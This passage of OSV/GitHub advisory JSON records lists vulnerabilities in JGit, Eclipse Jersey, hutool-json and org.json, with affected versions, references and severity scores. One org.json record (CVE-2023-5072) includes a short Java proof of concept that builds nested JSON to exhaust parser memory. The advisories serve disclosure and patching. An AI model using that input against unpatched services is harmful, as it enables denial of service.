"WEB", "url": "https://github.com/eclipse-jgit/jgit/issues/30" }, { "type": "PACKAGE", "url": "https://git.eclipse.org/c/jgit/jgit.git" }, { "type": "WEB", "url": "https://git.eclipse.org/c/jgit/jgit.git/commit/?id=9072103f3b3cf64dd12ad2949836ab98f62dabf1" }, { "type": "WEB", "url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/11" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/5.13.3" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/6.6.1" } ], "database_specific": { "cwe_ids": [ "CWE-178" ], "github_reviewed": true, "github_reviewed_at": "2023-09-18T19:17:54Z", "nvd_published_at": "2023-09-12T10:15:29Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6vvc-c2m3-cjf3", "published": "2022-05-17T19:57:29Z", "modified": "2024-09-25T20:01:24.028730Z", "aliases": [ "CVE-2014-9390", "PYSEC-2020-217" ], 
"summary": "JGit Improper Input Validation vulnerability", "details": "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine; libgit2; Egit; and JGit allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", "affected": [ { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.5.3" } ] } ], "versions": [ "1.2.0.201112221803-r", "1.3.0.201202151440-r", "2.0.0.201206130900-r", "2.1.0.201209190230-r", "2.2.0.201212191850-r", "2.3.1.201302201838-r", "3.0.0.201306101825-r", "3.1.0.201310021548-r", "3.2.0.201312181205-r", "3.3.0.201403021825-r", "3.3.1.201403241930-r", "3.3.2.201404171909-r", "3.4.0.201405051725-m7", "3.4.0.201405211411-rc1", "3.4.0.201405281120-rc2", "3.4.0.201406041058-rc3", "3.4.0.201406110918-r", "3.4.1.201406201815-r", "3.4.2.201412180340-r", "3.5.0.201409071800-rc1", "3.5.0.201409260305-r", "3.5.1.201410131835-r", "3.5.2.201411120430-r" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-6vvc-c2m3-cjf3/GHSA-6vvc-c2m3-cjf3.json" } }, { "package": { "name": "mercurial", "ecosystem": "PyPI", "purl": "pkg:pypi/mercurial" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.2.3" } ] } ], "versions": [ "0.8.1", "0.9", "0.9.1", "0.9.2", "0.9.3", "0.9.4", "0.9.5", "1.0", "1.0.1", "1.0.2", "1.1", "1.1.1", "1.1.2", "1.2", "1.2.1", "1.3", "1.3.1", "1.4", "1.4.1", "1.4.2", "1.4.3", "1.5", "1.5.1", "1.5.2", "1.5.3", "1.5.4", "1.6", "1.6.1", 
"1.6.2", "1.6.3", "1.6.4", "1.7", "1.7.1", "1.7.2", "1.7.3", "1.7.5", "1.8", "1.8.1", "1.8.2", "1.8.3", "1.8.4", "1.9", "1.9.1", "1.9.2", "1.9.3", "2.0", "2.0.1", "2.0.2", "2.1", "2.1.1", "2.1.2", "2.2", "2.2.2", "2.3", "2.4.1", "2.5", "2.5.1", "2.5.2", "2.6", "2.6.1", "2.6.2", "2.6.3", "2.7.0", "2.7.1", "2.7.2", "2.8", "2.8.1", "2.8.2", "2.9", "2.9.1", "3.0", "3.0.1", "3.1", "3.1.1", "3.1.2", "3.2", "3.2.1", "3.2.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-6vvc-c2m3-cjf3/GHSA-6vvc-c2m3-cjf3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9390" }, { "type": "WEB", "url": "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915" }, { "type": "WEB", "url": "https://github.com/blog/1938-git-client-vulnerability-announced" }, { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/mercurial/PYSEC-2020-217.yaml" }, { "type": "WEB", "url": "https://libgit2.org/security" }, { "type": "WEB", "url": "https://news.ycombinator.com/item?id=8769667" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/3.5.3" }, { "type": "WEB", "url": "https://web.archive.org/web/20211204220400/https://securitytracker.com/id?1031404" }, { "type": "WEB", "url": "http://article.gmane.org/gmane.linux.kernel/1853266" }, { "type": "WEB", "url": "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html" }, { "type": "WEB", "url": "http://mercurial.selenic.com/wiki/WhatsNew" }, { "type": "WEB", "url": "http://securitytracker.com/id?1031404" }, { "type": "WEB", "url": "http://support.apple.com/kb/HT204147" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2023-01-26T23:53:52Z", "nvd_published_at": "2020-02-12T02:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vrpq-qp53-qv56", "published": "2025-05-21T21:31:37Z", "modified": "2025-10-14T14:04:29.533722Z", "aliases": [ "CVE-2025-4949" ], "related": [ "CGA-2h3q-7r7p-cmjc", "CGA-693f-m3w9-2fg3", "CGA-h9p7-2rvv-2cw5", "CGA-x238-2v8w-3j6m" ], "summary": "Eclipse JGit XML External Entity (XXE) Vulnerability", "details": "In Eclipse JGit versions 7.2.0.202503040940-r and older, the ManifestParser class used by the repo command and the AmazonS3 class used to implement the experimental amazons3 git transport protocol allowing to store git pack files in an Amazon S3 bucket, are vulnerable to XML External Entity (XXE) attacks when parsing XML files. This vulnerability can lead to information disclosure, denial of service, and other security issues.", "affected": [ { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.2.0.202503040940-r" }, { "fixed": "7.2.1.202505142326-r" } ] } ], "versions": [ "7.2.0.202503040940-r" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-vrpq-qp53-qv56/GHSA-vrpq-qp53-qv56.json" } }, { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.1.0.202411261347-r" }, { "fixed": "7.1.1.202505221757-r" } ] } ], "versions": [ "7.1.0.202411261347-r" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-vrpq-qp53-qv56/GHSA-vrpq-qp53-qv56.json" } }, { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": 
"Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0.202409031743-r" }, { "fixed": "7.0.1.202505221510-r" } ] } ], "versions": [ "7.0.0.202409031743-r" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-vrpq-qp53-qv56/GHSA-vrpq-qp53-qv56.json" } }, { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "6.10.1.202505221210-r" } ] } ], "versions": [ "1.2.0.201112221803-r", "1.3.0.201202151440-r", "2.0.0.201206130900-r", "2.1.0.201209190230-r", "2.2.0.201212191850-r", "2.3.1.201302201838-r", "3.0.0.201306101825-r", "3.1.0.201310021548-r", "3.2.0.201312181205-r", "3.3.0.201403021825-r", "3.3.1.201403241930-r", "3.3.2.201404171909-r", "3.4.0.201405051725-m7", "3.4.0.201405211411-rc1", "3.4.0.201405281120-rc2", "3.4.0.201406041058-rc3", "3.4.0.201406110918-r", "3.4.1.201406201815-r", "3.4.2.201412180340-r", "3.5.0.201409071800-rc1", "3.5.0.201409260305-r", "3.5.1.201410131835-r", "3.5.2.201411120430-r", "3.5.3.201412180710-r", "3.6.0.201411121045-m1", "3.6.0.201412230720-r", "3.6.1.201501031845-r", "3.6.2.201501210735-r", "3.7.0.201502260915-r", "3.7.1.201504261725-r", "4.0.0.201505050340-m2", "4.0.0.201505260635-rc2", "4.0.0.201506020755-rc3", "4.0.0.201506090130-r", "4.0.1.201506240215-r", "4.0.2.201509141540-r", "4.0.3.201509231615-r", "4.1.0.201509280440-r", "4.1.1.201511131810-r", "4.1.2.201602141800-r", "4.10.0.201712302008-r", "4.11.0.201803080745-r", "4.11.1.201807311124-r", "4.11.2.201809100523-r", "4.11.3.201809181037-r", "4.11.4.201810060650-r", "4.11.5.201810191925-r", "4.11.6.201812241910-r", "4.11.7.201903122105-r", "4.11.8.201904181247-r", "4.11.9.201909030838-r", "4.2.0.201601211800-r", "4.3.0.201604071810-r", 
"4.3.1.201605051710-r", "4.4.0.201605250940-rc1", "4.4.0.201606070830-r", "4.4.1.201607150455-r", "4.5.0.201609210915-r", "4.5.1.201703201650-r", "4.5.2.201704071617-r", "4.5.3.201708160445-r", "4.5.4.201711221230-r", "4.5.5.201812240535-r", "4.5.6.201903121547-r", "4.5.7.201904151645-r", "4.6.0.201612231935-r", "4.6.1.201703071140-r", "4.7.0.201704051617-r", "4.7.1.201706071930-r", "4.7.2.201807261330-r", "4.7.3.201809090215-r", "4.7.4.201809180905-r", "4.7.5.201810051826-r", "4.7.6.201810191618-r", "4.7.7.201812240805-r", "4.7.8.201903121755-r", "4.7.9.201904161809-r", "4.8.0.201705170830-rc1", "4.8.0.201706111038-r", "4.9.0.201710071750-r", "4.9.1.201712030800-r", "4.9.10.201904181027-r", "4.9.2.201712150930-r", "4.9.3.201807311005-r", "4.9.4.201809090327-r", "4.9.5.201809180939-r", "4.9.6.201810051924-r", "4.9.7.201810191756-r", "4.9.8.201812241815-r", "4.9.9.201903122025-r", "5.0.0.201805151920-m7", "5.0.0.201805221745-rc1", "5.0.0.201805301535-rc2", "5.0.0.201806131550-r", "5.0.1.201806211838-r", "5.0.2.201807311906-r", "5.0.3.201809091024-r", "5.1.0.201809111528-r", "5.1.1.201809181055-r", "5.1.10.201908230655-r", "5.1.11.201909031202-r", "5.1.12.201910011832-r", "5.1.13.202002110435-r", "5.1.14.202011251942-r", "5.1.15.202012011955-r", "5.1.16.202106041830-r", "5.1.2.201810061102-r", "5.1.3.201810200350-r", "5.1.5.201812261915-r", "5.1.6.201903130242-r", "5.1.7.201904200442-r", "5.1.8.201906050907-r", "5.1.9.201908210455-r", "5.10.0.202012080955-r", "5.11.0.202103091610-r", "5.11.1.202105131744-r", "5.12.0.202106070339-r", "5.13.0.202109080827-r", "5.13.1.202206130422-r", "5.13.2.202306221912-r", "5.13.3.202401111512-r", "5.13.4.202507202350-r", "5.13.5.202508271544-r", "5.2.0.201812061821-r", "5.2.1.201812262042-r", "5.2.2.201904231744-r", "5.3.0.201903130848-r", "5.3.1.201904271842-r", "5.3.2.201906051522-r", "5.3.4.201908231101-r", "5.3.5.201909031855-r", "5.3.6.201910020505-r", "5.3.7.202002110540-r", "5.3.8.202011260953-r", "5.3.9.202012012026-r", 
"5.4.0.201906121030-r", "5.4.2.201908231537-r", "5.4.3.201909031940-r", "5.5.0.201909110433-r", "5.5.1.201910021850-r", "5.6.0.201912101111-r", "5.6.1.202002131546-r", "5.7.0.202003090808-r", "5.7.0.202003110725-r", "5.8.0.202006091008-r", "5.8.1.202007141445-r", "5.9.0.202009080501-r", "6.0.0.202111291000-r", "6.1.0.202203080745-r", "6.10.0.202406032230-r", "6.2.0.202206071550-r", "6.3.0.202209071007-r", "6.4.0.202211300538-r", "6.5.0.202303070854-r", "6.6.0.202305301015-r", "6.6.1.202309021850-r", "6.7.0.202309050840-r", "6.8.0.202311291450-r", "6.9.0.202403050737-r" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-vrpq-qp53-qv56/GHSA-vrpq-qp53-qv56.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4949" }, { "type": "PACKAGE", "url": "https://github.com/eclipse-jgit/jgit" }, { "type": "WEB", "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/64" }, { "type": "WEB", "url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/281" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/5.13.4" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/6.10.1" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/7.0.1" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/7.1.1" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/7.2.1" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2025-05-22T18:49:33Z", "nvd_published_at": "2025-05-21T07:16:01Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/S:N/AU:Y/R:U/V:D/RE:L/U:Green" } ] }, { "schema_version": "1.7.3", "id": 
"GHSA-c43q-5hpj-4crv", "published": "2021-04-23T16:55:01Z", "modified": "2024-03-08T05:18:14.836767Z", "aliases": [ "CVE-2021-28168" ], "related": [ "CVE-2021-28168" ], "summary": "Local information disclosure via system temporary directory", "details": "## Impact\nEclipse Jersey 2.28 - 2.33 and Eclipse Jersey 3.0.0 - 3.0.1 contains a local information disclosure vulnerability. This is due to the use of the `File.createTempFile` which creates a file inside of the system temporary directory with the permissions: `-rw-r--r--`. Thus the contents of this file are viewable by all other users locally on the system. As such, if the contents written is security sensitive, it can be disclosed to other local users.\n\n## Workaround\n\nThis issue can be mitigated by manually setting the `java.io.tmpdir` system property when launching the JVM.\n\n## Patches\n\nJersey 2.34 and 3.0.2 forward sets the correct permissions on the temporary file created by Jersey.\n\n### References\n \n - https://github.com/eclipse-ee4j/jersey/pull/4712\n - [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html)\n - [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html)\n\n## Similar Vulnerabilities\n\nSimilar, but not the same:\n\n - JUnit 4 - https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp\n - Google Guava - https://github.com/google/guava/issues/4011\n - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945\n - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824\n - Eclipse Jetty - https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6\n\n\n---\n\nOriginal Disclosure:\n\n\u003e Hello Jersey Security Team,\n\u003e \n\u003e Utilizing a custom CodeQL query written as a part of the [GitHub Security Lab](https://securitylab.github.com/) [Bug Bounty 
program](https://securitylab.github.com/bounties), I've unearthed a local temporary file information disclosure vulnerability.\n\u003e \n\u003e You can see the custom CodeQL query utilized here:\n\u003e https://lgtm.com/query/8831016213790320486/\n\u003e \n\u003e This particular vulnerability exists because on unix-like systems (not including modern versions of MacOS) the system temporary directory is shared between all users. As such, failure to correctly set file permissions and/or verify exclusive creation of directories can lead to either local information disclosure, or local file hijacking by another user.\n\u003e \n\u003e This vulnerability impacts the following locations in this project's source:\n\u003e \n\u003e - https://github.com/eclipse-ee4j/jersey/blob/01c6a32a2064aeff2caa8133472e33affeb8a29a/core-common/src/main/java/org/glassfish/jersey/message/internal/FileProvider.java#L64-L73\n\u003e - https://github.com/eclipse-ee4j/jersey/blob/01c6a32a2064aeff2caa8133472e33affeb8a29a/media/multipart/src/main/java/org/glassfish/jersey/media/multipart/internal/FormDataParamValueParamProvider.java#L202-L208\n\u003e \n\u003e This vulnerability exists because of the vulnerability in the `Utils.createTempFile`:\n\u003e \n\u003e https://github.com/eclipse-ee4j/jersey/blob/01c6a32a2064aeff2caa8133472e33affeb8a29a/core-common/src/main/java/org/glassfish/jersey/message/internal/Utils.java#L42-L53\n\u003e \n\u003e This is because `File.createTempFile` creates a file inside of the system temporary directory with the permissions: `-rw-r--r--`. 
Thus the contents of this file are viewable by all other users locally on the system.\n\u003e \n\u003e If there is sensitive information written to these files, it is disclosed to other local users on this system.\n\u003e \n\u003e The fix for this vulnerability is to use the `Files` API (instead of the `File` API) to create temporary files/directories as this new API correctly sets the posix file permissions.", "affected": [ { "package": { "name": "org.glassfish.jersey.core:jersey-common", "ecosystem": "Maven", "purl": "pkg:maven/org.glassfish.jersey.core/jersey-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.28" }, { "fixed": "2.34" } ] } ], "versions": [ "2.28", "2.29", "2.29.1", "2.30", "2.30.1", "2.31", "2.32", "2.33" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.33", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-c43q-5hpj-4crv/GHSA-c43q-5hpj-4crv.json" } }, { "package": { "name": "org.glassfish.jersey.core:jersey-common", "ecosystem": "Maven", "purl": "pkg:maven/org.glassfish.jersey.core/jersey-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.2" } ] } ], "versions": [ "3.0.0", "3.0.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.0.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-c43q-5hpj-4crv/GHSA-c43q-5hpj-4crv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse-ee4j/jersey/security/advisories/GHSA-c43q-5hpj-4crv" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28168" }, { "type": "WEB", "url": "https://github.com/eclipse-ee4j/jersey/pull/4712" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rdff6939e6c8dd620e20b013d9a35f57d42b3cd19e1d0483d85dfa2fd@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd54b42edccc1b993853a9c4943a9b16db763f5e2febf6e64b7d0fe3c@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc6221670de35b819fe191e7d8f2d17bc000549bd554020cec644b71e@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc288874c330b3af9e29a1a114c5e0d24fff7a79eaa341f551535c8c0@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rafc3c4cee534f478cbf8acf91e48373e291a21151f030e8132662a7b@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra3d7cd37fc794981a885332af2f8df0d873753380ea19935d6d847fc@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra3290fe51b4546fac195724c4187c4cb7fc5809bc596c2f7e97606f4@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2722171d569370a9e15147d9f3f6138ad9a188ee879c0156aa2d73a@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96658b899fcdbf04947257d201dc5a0abdbb5fb0a8f4ec0a6c15e70f@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dadc8fe82071aba841d673ffadf34728bff4357796b1990a66e3af1@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r454f38e85db149869c5a92c993c402260a4f8599bf283f6cfaada972@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r42fef440487a04cf5e487a9707ef5119d2dd5b809919f25ef4296fc4@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4066176a7352e021d7a81af460044bde8d57f40e98f8e4a31923af3a@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r305fb82e5c005143c1e2ec986a19c0a44f42189ab2580344dc955359@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r280438f7cb4b3b1c9dfda9d7b05fa2a5cfab68618c6afee8169ecdaa@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-378", "CWE-379", "CWE-668", "CWE-732" ], "github_reviewed": true, "github_reviewed_at": "2021-04-22T19:22:31Z", "nvd_published_at": "2021-04-22T18:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3vqj-43w4-2q58", "published": "2022-12-13T15:30:26Z", "modified": "2024-04-15T20:32:09.965200Z", "aliases": [ "CVE-2022-45688" ], "summary": "json stack overflow vulnerability", "details": "A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 and org.json:json before version 20230227 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data.", "affected": [ { "package": { "name": "cn.hutool:hutool-json", "ecosystem": "Maven", "purl": "pkg:maven/cn.hutool/hutool-json" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "5.8.25" } ] } ], "versions": [ "4.0.0", "4.0.1", "4.0.10", "4.0.11", "4.0.12", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.0.6", "4.0.7", "4.0.8", "4.0.9", "4.1.0", "4.1.1", "4.1.10", "4.1.11", "4.1.12", "4.1.13", "4.1.14", "4.1.15", "4.1.16", "4.1.17", "4.1.18", "4.1.19", "4.1.2", "4.1.20", "4.1.21", "4.1.3", "4.1.4", "4.1.5", "4.1.6", "4.1.7", "4.1.8", "4.1.9", "4.2.1", "4.3.0", "4.3.1", "4.3.2", "4.4.0", "4.4.1", "4.4.2", "4.4.3", "4.4.4", "4.4.5", "4.5.0", "4.5.1", "4.5.10", "4.5.11", "4.5.12", "4.5.13", "4.5.14", "4.5.15", "4.5.16", "4.5.17", "4.5.18", "4.5.2", "4.5.3", "4.5.4", "4.5.5", 
"4.5.6", "4.5.7", "4.5.8", "4.5.9", "4.6.0", "4.6.1", "4.6.10", "4.6.11", "4.6.12", "4.6.13", "4.6.14", "4.6.15", "4.6.16", "4.6.17", "4.6.2", "4.6.3", "4.6.4", "4.6.5", "4.6.6", "4.6.7", "4.6.8", "5.0.0", "5.0.1", "5.0.2", "5.0.3", "5.0.4", "5.0.5", "5.0.6", "5.0.7", "5.1.0", "5.1.1", "5.1.2", "5.1.3", "5.1.4", "5.1.5", "5.2.0", "5.2.1", "5.2.2", "5.2.3", "5.2.4", "5.2.5", "5.3.0", "5.3.1", "5.3.10", "5.3.2", "5.3.3", "5.3.4", "5.3.5", "5.3.6", "5.3.7", "5.3.8", "5.3.9", "5.4.0", "5.4.1", "5.4.2", "5.4.3", "5.4.4", "5.4.5", "5.4.6", "5.4.7", "5.5.0", "5.5.1", "5.5.2", "5.5.3", "5.5.4", "5.5.5", "5.5.6", "5.5.7", "5.5.8", "5.5.9", "5.6.0", "5.6.1", "5.6.2", "5.6.3", "5.6.4", "5.6.5", "5.6.6", "5.6.7", "5.7.0", "5.7.1", "5.7.10", "5.7.11", "5.7.12", "5.7.13", "5.7.14", "5.7.15", "5.7.16", "5.7.17", "5.7.18", "5.7.19", "5.7.2", "5.7.20", "5.7.21", "5.7.22", "5.7.3", "5.7.4", "5.7.5", "5.7.6", "5.7.7", "5.7.8", "5.7.9", "5.8.0", "5.8.0.M1", "5.8.0.M2", "5.8.0.M3", "5.8.0.M4", "5.8.1", "5.8.10", "5.8.11", "5.8.12", "5.8.13", "5.8.14", "5.8.15", "5.8.16", "5.8.17", "5.8.18", "5.8.19", "5.8.2", "5.8.20", "5.8.21", "5.8.22", "5.8.23", "5.8.24", "5.8.3", "5.8.4", "5.8.4.M1", "5.8.5", "5.8.6", "5.8.7", "5.8.8", "5.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-3vqj-43w4-2q58/GHSA-3vqj-43w4-2q58.json" } }, { "package": { "name": "org.json:json", "ecosystem": "Maven", "purl": "pkg:maven/org.json/json" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "20230227" } ] } ], "versions": [ "20070829", "20080701", "20090211", "20131018", "20140107", "20141113", "20150729", "20151123", "20160212", "20160807", "20160810", "20170516", "20171018", "20180130", "20180813", "20190722", "20200518", "20201115", "20210307", "20211205", "20220320", "20220924" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-3vqj-43w4-2q58/GHSA-3vqj-43w4-2q58.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45688" }, { "type": "WEB", "url": "https://github.com/dromara/hutool/issues/2748" }, { "type": "WEB", "url": "https://github.com/stleary/JSON-java/issues/708" }, { "type": "WEB", "url": "https://github.com/dromara/hutool/commit/6a2b585de0a380e8c12016dbaa1620b69be11b8c" }, { "type": "WEB", "url": "https://github.com/stleary/JSON-java/commit/a6e412bded7a0ad605adfeca029318f184c32102" }, { "type": "WEB", "url": "https://github.com/dromara/hutool/releases/tag/5.8.25" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-12-13T19:25:03Z", "nvd_published_at": "2022-12-13T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4jq9-2xhw-jpx7", "published": "2023-11-14T22:24:08Z", "modified": "2025-08-22T21:25:08.510140Z", "aliases": [ "CVE-2023-5072" ], "related": [ "CGA-7g9h-xgv7-r8j3" ], "summary": "Java: DoS Vulnerability in JSON-JAVA", "details": "### Summary\nA denial of service vulnerability in JSON-Java was discovered by [ClusterFuzz](https://google.github.io/clusterfuzz/). A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used. There are two issues: (1) the parser bug can be used to circumvent a check that is supposed to prevent the key in a JSON object from itself being another JSON object; (2) if a key does end up being a JSON object then it gets converted into a string, using `\\` to escape special characters, including `\\` itself. 
So by nesting JSON objects, with a key that is a JSON object that has a key that is a JSON object, and so on, we can get an exponential number of `\\` characters in the escaped string.\n\n### Severity\nHigh - Because this is an already-fixed DoS vulnerability, the only remaining impact possible is for existing binaries that have not been updated yet.\n\n### Proof of Concept\n```java\npackage orgjsonbug;\n\nimport org.json.JSONObject;\n\n/**\n * Illustrates a bug in JSON-Java.\n */\npublic class Bug {\n private static String makeNested(int depth) {\n if (depth == 0) {\n return \"{\\\"a\\\":1}\";\n }\n return \"{\\\"a\\\":1;\\t\\0\" + makeNested(depth - 1) + \":1}\";\n }\n\n public static void main(String[] args) {\n String input = makeNested(30);\n System.out.printf(\"Input string has length %d: %s\\n\", input.length(), input);\n JSONObject output = new JSONObject(input);\n System.out.printf(\"Output JSONObject has length %d: %s\\n\", output.toString().length(), output);\n }\n}\n```\nWhen run, this reports that the input string has length 367. 
Then, after a long pause, the program crashes inside new JSONObject with OutOfMemoryError.\n\n### Further Analysis\nThe issue is fixed by [this PR](https://github.com/stleary/JSON-java/pull/759).\n\n### Timeline\n**Date reported**: 07/14/2023\n**Date fixed**: \n**Date disclosed**: 10/12/2023", "affected": [ { "package": { "name": "org.json:json", "ecosystem": "Maven", "purl": "pkg:maven/org.json/json" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "20231013" } ] } ], "versions": [ "20070829", "20080701", "20090211", "20131018", "20140107", "20141113", "20150729", "20151123", "20160212", "20160807", "20160810", "20170516", "20171018", "20180130", "20180813", "20190722", "20200518", "20201115", "20210307", "20211205", "20220320", "20220924", "20230227", "20230618" ], "database_specific": { "last_known_affected_version_range": "\u003c= 20230618", "source": 